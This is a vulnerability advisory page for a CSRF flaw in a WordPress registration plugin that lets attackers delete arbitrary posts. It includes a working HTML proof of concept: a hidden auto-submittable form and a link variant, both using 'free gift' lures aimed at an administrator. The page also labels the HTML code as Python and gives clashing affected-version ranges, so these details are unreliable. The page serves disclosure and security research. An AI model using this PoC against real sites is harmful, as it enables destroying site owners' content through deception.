Security Vulnerability Report
中文
CVE-2025-14976 CVSS 5.4 MEDIUM

CVE-2025-14976

Published: 2026-01-10 09:15:49
Last Modified: 2026-04-15 00:35:42

Description

The User Registration & Membership – Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.4.8. This is due to missing or incorrect nonce validation on the 'process_row_actions' function with the 'delete' action. This makes it possible for unauthenticated attackers to delete arbitrary post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

User Registration & Membership插件 < 4.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-14976 --> <!-- This PoC demonstrates how an attacker can trick an admin to delete arbitrary posts --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-14976</title> </head> <body> <h1>CSRF Attack PoC - Delete Arbitrary Post</h1> <p>Click the button below to execute the attack (this is for educational purposes only)</p> <!-- Hidden form that auto-submits to delete a post --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin.php" method="POST" style="display:none;"> <input type="hidden" name="page" value="user-registration"> <input type="hidden" name="action" value="delete"> <input type="hidden" name="id" value="TARGET_POST_ID"> <input type="hidden" name="_wpnonce" value=""> <!-- Missing or empty nonce --> <input type="hidden" name="paged" value="1"> </form> <button onclick="document.getElementById('csrfForm').submit();">Click for free gift!</button> <script> // Auto-submit after page load (for more aggressive attack) // window.onload = function() { document.getElementById('csrfForm').submit(); }; </script> </body> </html> <!-- Alternative: Direct link-based attack --> <!-- <a href="http://target-site.com/wp-admin/admin.php?page=user-registration&action=delete&id=TARGET_ID">Click here for prizes!</a> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14976", "sourceIdentifier": "[email protected]", "published": "2026-01-10T09:15:48.863", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The User Registration & Membership – Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.4.8. This is due to missing or incorrect nonce validation on the 'process_row_actions' function with the 'delete' action. This makes it possible for unauthenticated attackers to delete arbitrary post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin User Registration &amp; Membership – Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction &amp; Membership Plugin para WordPress es vulnerable a falsificación de petición en sitios cruzados en todas las versiones hasta, e incluyendo, la 4.4.8. Esto se debe a validación de nonce faltante o incorrecta en la función 'process_row_actions' con la acción 'delete'. Esto hace posible que atacantes no autenticados eliminen publicación arbitraria a través de una petición falsificada siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/user-registration/tags/4.4.8/includes/abstracts/abstract-ur-list-table.php#L290", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3435099/user-registration", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e5495b4c-a1ac-4860-83a7-686d9436d983?source=cve", "source": "[email protected]"}]}}